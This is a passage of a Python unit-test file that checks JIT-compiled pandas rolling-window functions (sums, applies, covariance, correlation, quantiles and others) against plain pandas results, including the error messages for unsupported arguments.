pd.testing.assert_frame_equal(hpat_func(df, *args), test_impl(df, *args))
df = pd.DataFrame({'B': [0, 1, 2, -2, 4]})
pd.testing.assert_frame_equal(hpat_func(df, *args), test_impl(df, *args))
@skip_numba_jit
def test_fixed_apply2(self):
# test sequentially with generated dfs
def test_impl(df, w, c):
return df.rolling(w, center=c).apply(lambda a: a.sum())
hpat_func = self.jit(test_impl)
sizes = (121,)
wins = (3,)
if LONG_TEST:
sizes = (1, 2, 10, 11, 121, 1000)
wins = (2, 3, 5)
centers = (False, True)
for n, w, c in itertools.product(sizes, wins, centers):
df = pd.DataFrame({'B': np.arange(n)})
pd.testing.assert_frame_equal(hpat_func(df, w, c), test_impl(df, w, c))
@skip_numba_jit
def test_fixed_parallel1(self):
def test_impl(n, w, center):
df = pd.DataFrame({'B': np.arange(n)})
R = df.rolling(w, center=center).sum()
return R.B.sum()
hpat_func = self.jit(test_impl)
sizes = (121,)
wins = (5,)
if LONG_TEST:
sizes = (1, 2, 10, 11, 121, 1000)
wins = (2, 4, 5, 10, 11)
centers = (False, True)
for args in itertools.product(sizes, wins, centers):
self.assertEqual(hpat_func(*args), test_impl(*args),
"rolling fixed window with {}".format(args))
self.assertEqual(count_array_REPs(), 0)
self.assertEqual(count_parfor_REPs(), 0)
@skip_numba_jit
def test_fixed_parallel_apply1(self):
def test_impl(n, w, center):
df = pd.DataFrame({'B': np.arange(n)})
R = df.rolling(w, center=center).apply(lambda a: a.sum())
return R.B.sum()
hpat_func = self.jit(test_impl)
sizes = (121,)
wins = (5,)
if LONG_TEST:
sizes = (1, 2, 10, 11, 121, 1000)
wins = (2, 4, 5, 10, 11)
centers = (False, True)
for args in itertools.product(sizes, wins, centers):
self.assertEqual(hpat_func(*args), test_impl(*args),
"rolling fixed window with {}".format(args))
self.assertEqual(count_array_REPs(), 0)
self.assertEqual(count_parfor_REPs(), 0)
@skip_numba_jit
def test_variable1(self):
# test sequentially with manually created dfs
df1 = pd.DataFrame({'B': [0, 1, 2, np.nan, 4],
'time': [pd.Timestamp('20130101 09:00:00'),
pd.Timestamp('20130101 09:00:02'),
pd.Timestamp('20130101 09:00:03'),
pd.Timestamp('20130101 09:00:05'),
pd.Timestamp('20130101 09:00:06')]})
df2 = pd.DataFrame({'B': [0, 1, 2, -2, 4],
'time': [pd.Timestamp('20130101 09:00:01'),
pd.Timestamp('20130101 09:00:02'),
pd.Timestamp('20130101 09:00:03'),
pd.Timestamp('20130101 09:00:04'),
pd.Timestamp('20130101 09:00:09')]})
wins = ('2s',)
if LONG_TEST:
wins = ('1s', '2s', '3s', '4s')
# all functions except apply
for w, func_name in itertools.product(wins, test_funcs):
func_text = "def test_impl(df):\n return df.rolling('{}', on='time').{}()\n".format(w, func_name)
loc_vars = {}
exec(func_text, {}, loc_vars)
test_impl = loc_vars['test_impl']
hpat_func = self.jit(test_impl)
# XXX: skipping min/max for this test since the behavior of Pandas
# is inconsistent: it assigns NaN to last output instead of 4!
if func_name not in ('min', 'max'):
pd.testing.assert_frame_equal(hpat_func(df1), test_impl(df1))
pd.testing.assert_frame_equal(hpat_func(df2), test_impl(df2))
@skip_numba_jit
def test_variable2(self):
# test sequentially with generated dfs
wins = ('2s',)
sizes = (121,)
if LONG_TEST:
wins = ('1s', '2s', '3s', '4s')
sizes = (1, 2, 10, 11, 121, 1000)
# all functions except apply
for w, func_name in itertools.product(wins, test_funcs):
func_text = "def test_impl(df):\n return df.rolling('{}', on='time').{}()\n".format(w, func_name)
loc_vars = {}
exec(func_text, {}, loc_vars)
test_impl = loc_vars['test_impl']
hpat_func = self.jit(test_impl)
for n in sizes:
time = pd.date_range(start='1/1/2018', periods=n, freq='s')
df = pd.DataFrame({'B': np.arange(n), 'time': time})
pd.testing.assert_frame_equal(hpat_func(df), test_impl(df))
@skip_numba_jit
def test_variable_apply1(self):
# test sequentially with manually created dfs
df1 = pd.DataFrame({'B': [0, 1, 2, np.nan, 4],
'time': [pd.Timestamp('20130101 09:00:00'),
pd.Timestamp('20130101 09:00:02'),
pd.Timestamp('20130101 09:00:03'),
pd.Timestamp('20130101 09:00:05'),
pd.Timestamp('20130101 09:00:06')]})
df2 = pd.DataFrame({'B': [0, 1, 2, -2, 4],
'time': [pd.Timestamp('20130101 09:00:01'),
pd.Timestamp('20130101 09:00:02'),
pd.Timestamp('20130101 09:00:03'),
pd.Timestamp('20130101 09:00:04'),
pd.Timestamp('20130101 09:00:09')]})
wins = ('2s',)
if LONG_TEST:
wins = ('1s', '2s', '3s', '4s')
# all functions except apply
for w in wins:
func_text = "def test_impl(df):\n return df.rolling('{}', on='time').apply(lambda a: a.sum())\n".format(w)
loc_vars = {}
exec(func_text, {}, loc_vars)
test_impl = loc_vars['test_impl']
hpat_func = self.jit(test_impl)
pd.testing.assert_frame_equal(hpat_func(df1), test_impl(df1))
pd.testing.assert_frame_equal(hpat_func(df2), test_impl(df2))
@skip_numba_jit
def test_variable_apply2(self):
# test sequentially with generated dfs
wins = ('2s',)
sizes = (121,)
if LONG_TEST:
wins = ('1s', '2s', '3s', '4s')
# TODO: this crashes on Travis (3 process config) with size 1
sizes = (2, 10, 11, 121, 1000)
# all functions except apply
for w in wins:
func_text = "def test_impl(df):\n return df.rolling('{}', on='time').apply(lambda a: a.sum())\n".format(w)
loc_vars = {}
exec(func_text, {}, loc_vars)
test_impl = loc_vars['test_impl']
hpat_func = self.jit(test_impl)
for n in sizes:
time = pd.date_range(start='1/1/2018', periods=n, freq='s')
df = pd.DataFrame({'B': np.arange(n), 'time': time})
pd.testing.assert_frame_equal(hpat_func(df), test_impl(df))
@skip_numba_jit
@unittest.skipIf(platform.system() == 'Windows', "ValueError: time must be monotonic")
def test_variable_parallel1(self):
wins = ('2s',)
sizes = (121,)
if LONG_TEST:
wins = ('1s', '2s', '3s', '4s')
# XXX: Pandas returns time = [np.nan] for size==1 for some reason
sizes = (2, 10, 11, 121, 1000)
# all functions except apply
for w, func_name in itertools.product(wins, test_funcs):
func_text = "def test_impl(n):\n"
func_text += " df = pd.DataFrame({'B': np.arange(n), 'time': "
func_text += " pd.DatetimeIndex(np.arange(n) * 1000000000)})\n"
func_text += " res = df.rolling('{}', on='time').{}()\n".format(w, func_name)
func_text += " return res.B.sum()\n"
loc_vars = {}
exec(func_text, {'pd': pd, 'np': np}, loc_vars)
test_impl = loc_vars['test_impl']
hpat_func = self.jit(test_impl)
for n in sizes:
np.testing.assert_almost_equal(hpat_func(n), test_impl(n))
self.assertEqual(count_array_REPs(), 0)
self.assertEqual(count_parfor_REPs(), 0)
@skip_numba_jit
@unittest.skipIf(platform.system() == 'Windows', "ValueError: time must be monotonic")
def test_variable_apply_parallel1(self):
wins = ('2s',)
sizes = (121,)
if LONG_TEST:
wins = ('1s', '2s', '3s', '4s')
# XXX: Pandas returns time = [np.nan] for size==1 for some reason
sizes = (2, 10, 11, 121, 1000)
# all functions except apply
for w in wins:
func_text = "def test_impl(n):\n"
func_text += " df = pd.DataFrame({'B': np.arange(n), 'time': "
func_text += " pd.DatetimeIndex(np.arange(n) * 1000000000)})\n"
func_text += " res = df.rolling('{}', on='time').apply(lambda a: a.sum())\n".format(w)
func_text += " return res.B.sum()\n"
loc_vars = {}
exec(func_text, {'pd': pd, 'np': np}, loc_vars)
test_impl = loc_vars['test_impl']
hpat_func = self.jit(test_impl)
for n in sizes:
np.testing.assert_almost_equal(hpat_func(n), test_impl(n))
self.assertEqual(count_array_REPs(), 0)
self.assertEqual(count_parfor_REPs(), 0)
@skip_numba_jit
def test_series_fixed1(self):
# test series rolling functions
# all functions except apply
S1 = pd.Series([0, 1, 2, np.nan, 4])
S2 = pd.Series([0, 1, 2, -2, 4])
wins = (3,)
if LONG_TEST:
wins = (2, 3, 5)
centers = (False, True)
for func_name in test_funcs:
func_text = "def test_impl(S, w, c):\n return S.rolling(w, center=c).{}()\n".format(func_name)
loc_vars = {}
exec(func_text, {}, loc_vars)
test_impl = loc_vars['test_impl']
hpat_func = self.jit(test_impl)
for args in itertools.product(wins, centers):
pd.testing.assert_series_equal(hpat_func(S1, *args), test_impl(S1, *args))
pd.testing.assert_series_equal(hpat_func(S2, *args), test_impl(S2, *args))
# test apply
def apply_test_impl(S, w, c):
return S.rolling(w, center=c).apply(lambda a: a.sum())
hpat_func = self.jit(apply_test_impl)
for args in itertools.product(wins, centers):
pd.testing.assert_series_equal(hpat_func(S1, *args), apply_test_impl(S1, *args))
pd.testing.assert_series_equal(hpat_func(S2, *args), apply_test_impl(S2, *args))
@skip_numba_jit
def test_series_cov1(self):
# test series rolling functions
# all functions except apply
S1 = pd.Series([0, 1, 2, np.nan, 4])
S2 = pd.Series([0, 1, 2, -2, 4])
wins = (3,)
if LONG_TEST:
wins = (2, 3, 5)
centers = (False, True)
def test_impl(S, S2, w, c):
return S.rolling(w, center=c).cov(S2)
hpat_func = self.jit(test_impl)
for args in itertools.product([S1, S2], [S1, S2], wins, centers):
pd.testing.assert_series_equal(hpat_func(*args), test_impl(*args))
pd.testing.assert_series_equal(hpat_func(*args), test_impl(*args))
def test_impl2(S, S2, w, c):
return S.rolling(w, center=c).corr(S2)
hpat_func = self.jit(test_impl2)
for args in itertools.product([S1, S2], [S1, S2], wins, centers):
pd.testing.assert_series_equal(hpat_func(*args), test_impl2(*args))
pd.testing.assert_series_equal(hpat_func(*args), test_impl2(*args))
@skip_numba_jit
def test_df_cov1(self):
# test series rolling functions
# all functions except apply
df1 = pd.DataFrame({'A': [0, 1, 2, np.nan, 4], 'B': np.ones(5)})
df2 = pd.DataFrame({'A': [0, 1, 2, -2, 4], 'C': np.ones(5)})
wins = (3,)
if LONG_TEST:
wins = (2, 3, 5)
centers = (False, True)
def test_impl(df, df2, w, c):
return df.rolling(w, center=c).cov(df2)
hpat_func = self.jit(test_impl)
for args in itertools.product([df1, df2], [df1, df2], wins, centers):
pd.testing.assert_frame_equal(hpat_func(*args), test_impl(*args))
pd.testing.assert_frame_equal(hpat_func(*args), test_impl(*args))
def test_impl2(df, df2, w, c):
return df.rolling(w, center=c).corr(df2)
hpat_func = self.jit(test_impl2)
for args in itertools.product([df1, df2], [df1, df2], wins, centers):
pd.testing.assert_frame_equal(hpat_func(*args), test_impl2(*args))
pd.testing.assert_frame_equal(hpat_func(*args), test_impl2(*args))
@skip_sdc_jit('Series.rolling.min() unsupported exceptions')
def test_series_rolling_unsupported_values(self):
def test_impl(series, window, min_periods, center,
win_type, on, axis, closed):
return series.rolling(window, min_periods, center,
win_type, on, axis, closed).min()
hpat_func = self.jit(test_impl)
series = pd.Series(test_global_input_data_float64[0])
with self.assertRaises(ValueError) as raises:
hpat_func(series, -1, None, False, None, None, 0, None)
self.assertIn('window must be non-negative', str(raises.exception))
with self.assertRaises(ValueError) as raises:
hpat_func(series, 1, -1, False, None, None, 0, None)
self.assertIn('min_periods must be >= 0', str(raises.exception))
with self.assertRaises(ValueError) as raises:
hpat_func(series, 1, 2, False, None, None, 0, None)
self.assertIn('min_periods must be <= window', str(raises.exception))
with self.assertRaises(ValueError) as raises:
hpat_func(series, 1, 2, False, None, None, 0, None)
self.assertIn('min_periods must be <= window', str(raises.exception))
msg_tmpl = 'Method rolling(). The object {}\n expected: {}'
with self.assertRaises(ValueError) as raises:
hpat_func(series, 1, None, True, None, None, 0, None)
msg = msg_tmpl.format('center', 'False')
self.assertIn(msg, str(raises.exception))
with self.assertRaises(ValueError) as raises:
hpat_func(series, 1, None, False, 'None', None, 0, None)
msg = msg_tmpl.format('win_type', 'None')
self.assertIn(msg, str(raises.exception))
with self.assertRaises(ValueError) as raises:
hpat_func(series, 1, None, False, None, 'None', 0, None)
msg = msg_tmpl.format('on', 'None')
self.assertIn(msg, str(raises.exception))
with self.assertRaises(ValueError) as raises:
hpat_func(series, 1, None, False, None, None, 1, None)
msg = msg_tmpl.format('axis', '0')
self.assertIn(msg, str(raises.exception))
with self.assertRaises(ValueError) as raises:
hpat_func(series, 1, None, False, None, None, 0, 'None')
msg = msg_tmpl.format('closed', 'None')
self.assertIn(msg, str(raises.exception))
@skip_sdc_jit('Series.rolling.min() unsupported exceptions')
def test_series_rolling_unsupported_types(self):
def test_impl(series, window, min_periods, center,
win_type, on, axis, closed):
return series.rolling(window, min_periods, center,
win_type, on, axis, closed).min()
hpat_func = self.jit(test_impl)
series = pd.Series(test_global_input_data_float64[0])
msg_tmpl = 'Method rolling(). The object {}\n given: {}\n expected: {}'
with self.assertRaises(TypingError) as raises:
hpat_func(series, '1', None, False, None, None, 0, None)
msg = msg_tmpl.format('window', 'unicode_type', 'int')
self.assertIn(msg, str(raises.exception))
with self.assertRaises(TypingError) as raises:
hpat_func(series, 1, '1', False, None, None, 0, None)
msg = msg_tmpl.format('min_periods', 'unicode_type', 'None, int')
self.assertIn(msg, str(raises.exception))
with self.assertRaises(TypingError) as raises:
hpat_func(series, 1, None, 0, None, None, 0, None)
msg = msg_tmpl.format('center', 'int64', 'bool')
self.assertIn(msg, str(raises.exception))
with self.assertRaises(TypingError) as raises:
hpat_func(series, 1, None, False, -1, None, 0, None)
msg = msg_tmpl.format('win_type', 'int64', 'str')
self.assertIn(msg, str(raises.exception))
with self.assertRaises(TypingError) as raises:
hpat_func(series, 1, None, False, None, -1, 0, None)
msg = msg_tmpl.format('on', 'int64', 'str')
self.assertIn(msg, str(raises.exception))
with self.assertRaises(TypingError) as raises:
hpat_func(series, 1, None, False, None, None, None, None)
msg = msg_tmpl.format('axis', 'none', 'int, str')
self.assertIn(msg, str(raises.exception))
with self.assertRaises(TypingError) as raises:
hpat_func(series, 1, None, False, None, None, 0, -1)
msg = msg_tmpl.format('closed', 'int64', 'str')
self.assertIn(msg, str(raises.exception))
@skip_sdc_jit('Series.rolling.apply() unsupported Series index')
def test_series_rolling_apply_mean(self):
def test_impl(series, window, min_periods):
def func(x):
if len(x) == 0:
return np.nan
return x.mean()
return series.rolling(window, min_periods).apply(func)
hpat_func = self.jit(test_impl)
all_data = [
list(range(10)), [1., -1., 0., 0.1, -0.1],
[1., np.inf, np.inf, -1., 0., np.inf, np.NINF, np.NINF],
[np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, np.NINF, np.NZERO]
]
indices = [list(range(len(data)))[::-1] for data in all_data]
for data, index in zip(all_data, indices):
series = pd.Series(data, index, name='A')
for window in range(0, len(series) + 3, 2):
for min_periods in range(0, window + 1, 2):
with self.subTest(series=series, window=window,
min_periods=min_periods):
jit_result = hpat_func(series, window, min_periods)
ref_result = test_impl(series, window, min_periods)
pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.apply() unsupported exceptions')
def test_series_rolling_apply_unsupported_types(self):
def test_impl(raw):
def func(x):
if len(x) == 0:
return np.nan
return np.median(x)
series = pd.Series([1., -1., 0., 0.1, -0.1])
return series.rolling(3).apply(func, raw=raw)
hpat_func = self.jit(test_impl)
with self.assertRaises(TypingError) as raises:
hpat_func(1)
msg = 'Method rolling.apply(). The object raw\n given: int64\n expected: bool'
self.assertIn(msg, str(raises.exception))
@unittest.skip('Series.rolling.apply() unsupported args')
def test_series_rolling_apply_args(self):
def test_impl(series, window, min_periods, q):
def func(x, q):
if len(x) == 0:
return np.nan
return np.quantile(x, q)
return series.rolling(window, min_periods).apply(func, raw=None, args=(q,))
hpat_func = self.jit(test_impl)
all_data = [
list(range(10)), [1., -1., 0., 0.1, -0.1],
[1., np.inf, np.inf, -1., 0., np.inf, np.NINF, np.NINF],
[np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, np.NINF, np.NZERO]
]
indices = [list(range(len(data)))[::-1] for data in all_data]
for data, index in zip(all_data, indices):
series = pd.Series(data, index, name='A')
for window in range(0, len(series) + 3, 2):
for min_periods in range(0, window + 1, 2):
for q in [0.25, 0.5, 0.75]:
with self.subTest(series=series, window=window,
min_periods=min_periods, q=q):
jit_result = hpat_func(series, window, min_periods, q)
ref_result = test_impl(series, window, min_periods, q)
pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.corr() unsupported Series index')
def test_series_rolling_corr(self):
def test_impl(series, window, min_periods, other):
return series.rolling(window, min_periods).corr(other)
hpat_func = self.jit(test_impl)
all_data = [
list(range(10)), [1., -1., 0., 0.1, -0.1],
[1., np.inf, np.inf, -1., 0., np.inf, np.NINF, np.NINF],
[np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, np.NINF, np.NZERO]
]
for main_data, other_data in product(all_data, all_data):
series = pd.Series(main_data)
other = pd.Series(other_data)
for window in range(0, len(series) + 3, 2):
for min_periods in range(0, window, 2):
with self.subTest(series=series, other=other,
window=window, min_periods=min_periods):
ref_result = test_impl(series, window, min_periods, other)
jit_result = hpat_func(series, window, min_periods, other)
pd.testing.assert_series_equal(ref_result, jit_result)
@skip_sdc_jit('Series.rolling.corr() unsupported Series index')
def test_series_rolling_corr_with_no_other(self):
def test_impl(series, window, min_periods):
return series.rolling(window, min_periods).corr()
hpat_func = self.jit(test_impl)
all_data = [
list(range(10)), [1., -1., 0., 0.1, -0.1],
[1., np.inf, np.inf, -1., 0., np.inf, np.NINF, np.NINF],
[np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, np.NINF, np.NZERO]
]
for data in all_data:
series = pd.Series(data)
for window in range(0, len(series) + 3, 2):
for min_periods in range(0, window, 2):
with self.subTest(series=series, window=window,
min_periods=min_periods):
jit_result = hpat_func(series, window, min_periods)
ref_result = test_impl(series, window, min_periods)
pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.corr() unsupported exceptions')
def test_series_rolling_corr_unsupported_types(self):
def test_impl(pairwise):
series = pd.Series([1., -1., 0., 0.1, -0.1])
return series.rolling(3, 3).corr(pairwise=pairwise)
hpat_func = self.jit(test_impl)
with self.assertRaises(TypingError) as raises:
hpat_func(1)
msg = 'Method rolling.corr(). The object pairwise\n given: int64\n expected: bool'
self.assertIn(msg, str(raises.exception))
@skip_sdc_jit('Series.rolling.count() unsupported Series index')
def test_series_rolling_count(self):
def test_impl(series, window, min_periods):
return series.rolling(window, min_periods).count()
hpat_func = self.jit(test_impl)
all_data = test_global_input_data_float64
indices = [list(range(len(data)))[::-1] for data in all_data]
for data, index in zip(all_data, indices):
series = pd.Series(data, index, name='A')
for window in range(0, len(series) + 3, 2):
for min_periods in range(0, window + 1, 2):
with self.subTest(series=series, window=window,
min_periods=min_periods):
jit_result = hpat_func(series, window, min_periods)
ref_result = test_impl(series, window, min_periods)
pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.cov() unsupported Series index')
def test_series_rolling_cov(self):
def test_impl(series, window, min_periods, other, ddof):
return series.rolling(window, min_periods).cov(other, ddof=ddof)
hpat_func = self.jit(test_impl)
all_data = [
list(range(5)), [1., -1., 0., 0.1, -0.1],
[1., np.inf, np.inf, -1., 0., np.inf, np.NINF, np.NINF],
[np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, np.NINF, np.NZERO]
]
for main_data, other_data in product(all_data, all_data):
series = pd.Series(main_data)
other = pd.Series(other_data)
for window in range(0, len(series) + 3, 2):
for min_periods, ddof in product(range(0, window, 2), [0, 1]):
with self.subTest(series=series, other=other, window=window,
min_periods=min_periods, ddof=ddof):
jit_result = hpat_func(series, window, min_periods, other, ddof)
ref_result = test_impl(series, window, min_periods, other, ddof)
pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.cov() unsupported Series index')
def test_series_rolling_cov_default(self):
def test_impl(series, window, min_periods):
return series.rolling(window, min_periods).cov()
hpat_func = self.jit(test_impl)
all_data = [
list(range(5)), [1., -1., 0., 0.1, -0.1],
[1., np.inf, np.inf, -1., 0., np.inf, np.NINF, np.NINF],
[np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, np.NINF, np.NZERO]
]
for data in all_data:
series = pd.Series(data)
for window in range(0, len(series) + 3, 2):
for min_periods in range(0, window, 2):
with self.subTest(series=series, window=window,
min_periods=min_periods):
jit_result = hpat_func(series, window, min_periods)
ref_result = test_impl(series, window, min_periods)
pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.cov() unsupported Series index')
@unittest.expectedFailure
def test_series_rolling_cov_issue_floating_point_rounding(self):
"""Cover issue of different float rounding in Python and SDC/Numba"""
def test_impl(series, window, min_periods, other, ddof):
return series.rolling(window, min_periods).cov(other, ddof=ddof)
hpat_func = self.jit(test_impl)
series = pd.Series(list(range(10)))
other = pd.Series([1., -1., 0., 0.1, -0.1])
jit_result = hpat_func(series, 6, 0, other, 1)
ref_result = test_impl(series, 6, 0, other, 1)
pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.cov() unsupported exceptions')
def test_series_rolling_cov_unsupported_types(self):
def test_impl(pairwise, ddof):
series = pd.Series([1., -1., 0., 0.1, -0.1])
return series.rolling(3, 3).cov(pairwise=pairwise, ddof=ddof)
hpat_func = self.jit(test_impl)
msg_tmpl = 'Method rolling.cov(). The object {}\n given: {}\n expected: {}'
with self.assertRaises(TypingError) as raises:
hpat_func(1, 1)
msg = msg_tmpl.format('pairwise', 'int64', 'bool')
self.assertIn(msg, str(raises.exception))
with self.assertRaises(TypingError) as raises:
hpat_func(None, '1')
msg = msg_tmpl.format('ddof', 'unicode_type', 'int')
self.assertIn(msg, str(raises.exception))
@skip_sdc_jit('Series.rolling.kurt() unsupported Series index')
def test_series_rolling_kurt(self):
def test_impl(series, window, min_periods):
return series.rolling(window, min_periods).kurt()
hpat_func = self.jit(test_impl)
all_data = test_global_input_data_float64
indices = [list(range(len(data)))[::-1] for data in all_data]
for data, index in zip(all_data, indices):
series = pd.Series(data, index, name='A')
for window in range(4, len(series) + 1):
for min_periods in range(window + 1):
with self.subTest(series=series, window=window,
min_periods=min_periods):
ref_result = test_impl(series, window, min_periods)
jit_result = hpat_func(series, window, min_periods)
pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.max() unsupported Series index')
def test_series_rolling_max(self):
def test_impl(series, window, min_periods):
return series.rolling(window, min_periods).max()
hpat_func = self.jit(test_impl)
all_data = test_global_input_data_float64
indices = [list(range(len(data)))[::-1] for data in all_data]
for data, index in zip(all_data, indices):
series = pd.Series(data, index, name='A')
# TODO: fix the issue when window = 0
for window in range(1, len(series) + 2):
for min_periods in range(window + 1):
with self.subTest(series=series, window=window,
min_periods=min_periods):
jit_result = hpat_func(series, window, min_periods)
ref_result = test_impl(series, window, min_periods)
pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.mean() unsupported Series index')
def test_series_rolling_mean(self):
def test_impl(series, window, min_periods):
return series.rolling(window, min_periods).mean()
hpat_func = self.jit(test_impl)
all_data = [
list(range(10)), [1., -1., 0., 0.1, -0.1],
[1., np.inf, np.inf, -1., 0., np.inf, np.NINF, np.NINF],
[np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, np.NINF, np.NZERO]
]
indices = [list(range(len(data)))[::-1] for data in all_data]
for data, index in zip(all_data, indices):
series = pd.Series(data, index, name='A')
for window in range(0, len(series) + 3, 2):
for min_periods in range(0, window + 1, 2):
with self.subTest(series=series, window=window,
min_periods=min_periods):
jit_result = hpat_func(series, window, min_periods)
ref_result = test_impl(series, window, min_periods)
pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.median() unsupported Series index')
def test_series_rolling_median(self):
def test_impl(series, window, min_periods):
return series.rolling(window, min_periods).median()
hpat_func = self.jit(test_impl)
all_data = test_global_input_data_float64
indices = [list(range(len(data)))[::-1] for data in all_data]
for data, index in zip(all_data, indices):
series = pd.Series(data, index, name='A')
for window in range(0, len(series) + 3, 2):
for min_periods in range(0, window + 1, 2):
with self.subTest(series=series, window=window,
min_periods=min_periods):
jit_result = hpat_func(series, window, min_periods)
ref_result = test_impl(series, window, min_periods)
pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.min() unsupported Series index')
def test_series_rolling_min(self):
def test_impl(series, window, min_periods):
return series.rolling(window, min_periods).min()
hpat_func = self.jit(test_impl)
all_data = test_global_input_data_float64
indices = [list(range(len(data)))[::-1] for data in all_data]
for data, index in zip(all_data, indices):
series = pd.Series(data, index, name='A')
# TODO: fix the issue when window = 0
for window in range(1, len(series) + 2):
for min_periods in range(window + 1):
with self.subTest(series=series, window=window,
min_periods=min_periods):
jit_result = hpat_func(series, window, min_periods)
ref_result = test_impl(series, window, min_periods)
pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.quantile() unsupported Series index')
def test_series_rolling_quantile(self):
def test_impl(series, window, min_periods, quantile):
return series.rolling(window, min_periods).quantile(quantile)
hpat_func = self.jit(test_impl)
all_data = [
list(range(10)), [1., -1., 0., 0.1, -0.1],
[1., np.inf, np.inf, -1., 0., np.inf, np.NINF, np.NINF],
[np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, np.NINF, np.NZERO]
]
indices = [list(range(len(data)))[::-1] for data in all_data]
quantiles = [0, 0.25, 0.5, 0.75, 1]
for data, index in zip(all_data, indices):
series = pd.Series(data, index, name='A')
for window in range(0, len(series) + 3, 2):
for min_periods, q in product(range(0, window, 2), quantiles):
with self.subTest(series=series, window=window,
min_periods=min_periods, quantiles=q):
jit_result = hpat_func(series, window, min_periods, q)
ref_result = test_impl(series, window, min_periods, q)
pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.quantile() unsupported exceptions')
def test_series_rolling_quantile_exception_unsupported_types(self):
def test_impl(quantile, interpolation):
series = pd.Series([1., -1., 0., 0.1, -0.1])
return series.rolling(3, 2).quantile(quantile, interpolation)
hpat_func = self.jit(test_impl)
msg_tmpl = 'Method rolling.quantile(). The object {}\n given: {}\n expected: {}'
with self.assertRaises(TypingError) as raises:
hpat_func('0.5', 'linear')
msg = msg_tmpl.format('quantile', 'unicode_type', 'float')
self.assertIn(msg, str(raises.exception))
with self.assertRaises(TypingError) as raises:
hpat_func(0.5, None)
msg = msg_tmpl.format('interpolation', 'none', 'str')
self.assertIn(msg, str(raises.exception))
@skip_sdc_jit('Series.rolling.quantile() unsupported exceptions')
def test_series_rolling_quantile_exception_unsupported_values(self):
def test_impl(quantile, interpolation):
series = pd.Series([1., -1., 0., 0.1, -0.1])
return series.rolling(3, 2).quantile(quantile, interpolation)
hpat_func = self.jit(test_impl)
with self.assertRaises(ValueError) as raises:
hpat_func(2, 'linear')
self.assertIn('quantile value not in [0, 1]', str(raises.exception))
with self.assertRaises(ValueError) as raises:
hpat_func(0.5, 'lower')
self.assertIn('interpolation value not "linear"', str(raises.exception))
@skip_sdc_jit('Series.rolling.skew() unsupported Series index')
def test_series_rolling_skew(self):
def test_impl(series, window, min_periods):
return series.rolling(window, min_periods).skew()
hpat_func = self.jit(test_impl)
all_data = test_global_input_data_float64
indices = [list(range(len(data)))[::-1] for data in all_data]
for data, index in zip(all_data, indices):
series = pd.Series(data, index, name='A')
for window in range(3, len(series) + 1):
for min_periods in range(window + 1):
with self.subTest(series=series, window=window,
min_periods=min_periods):
ref_result = test_impl(series, window, min_periods)
jit_result = hpat_func(series, window, min_periods)
pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.std() unsupported Series index')
def test_series_rolling_std(self):
test_impl = series_rolling_std_usecase
hpat_func = self.jit(test_impl)
all_data = [
list(range(10)), [1., -1., 0., 0.1, -0.1],
[1., np.inf, np.inf, -1., 0., np.inf, np.NINF, np.NINF],
[np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, np.NINF, np.NZERO]
]
indices = [list(range(len(data)))[::-1] for data in all_data]
for data, index in zip(all_data, indices):
series = pd.Series(data, index, name='A')
for window in range(0, len(series) + 3, 2):
for min_periods, ddof in product(range(0, window, 2), [0, 1]):
with self.subTest(series=series, window=window,
min_periods=min_periods, ddof=ddof):
jit_result = hpat_func(series, window, min_periods, ddof)
ref_result = test_impl(series, window, min_periods, ddof)
pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.std() unsupported exceptions')
def test_series_rolling_std_exception_unsupported_ddof(self):
test_impl = series_rolling_std_usecase
hpat_func = self.jit(test_impl)
series = pd.Series([1., -1., 0., 0.1, -0.1])
with self.assertRaises(TypingError) as raises:
hpat_func(series, 3, 2, '1')
msg = 'Method rolling.std(). The object ddof\n given: unicode_type\n expected: int'
self.assertIn(msg, str(raises.exception))
@skip_sdc_jit('Series.rolling.sum() unsupported Series index')
def test_series_rolling_sum(self):
def test_impl(series, window, min_periods):
return series.rolling(window, min_periods).sum()
hpat_func = self.jit(test_impl)
all_data = [
list(range(10)), [1., -1., 0., 0.1, -0.1],
[1., np.inf, np.inf, -1., 0., np.inf, np.NINF, np.NINF],
[np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, np.NINF, np.NZERO]
]
indices = [list(range(len(data)))[::-1] for data in all_data]
for data, index in zip(all_data, indices):
series = pd.Series(data, index, name='A')
for window in range(0, len(series) + 3, 2):
for min_periods in range(0, window + 1, 2):
with self.subTest(series=series, window=window,
min_periods=min_periods):
jit_result = hpat_func(series, window, min_periods)
ref_result = test_impl(series, window, min_periods)
pd.testing.assert_series_equal(jit_result, ref_result)
@skip_sdc_jit('Series.rolling.var() unsupported Series index')
def test_series_rolling_var(self):
test_impl = series_rolling_var_usecase
hpat_func = self.jit(test_impl)
all_data = [
list(range(10)), [1., -1., 0., 0.1, -0.1],
[1., np.inf, np.inf, -1., 0., np.inf, np.NINF, np.NINF],
[np.nan, np.inf, np.inf, np.nan, np.nan, np.nan, np.NINF, np.NZERO]
]
indices = [list(range(len(data)))[::-1] for data in all_data]
for data, index in zip(all_data, indices):
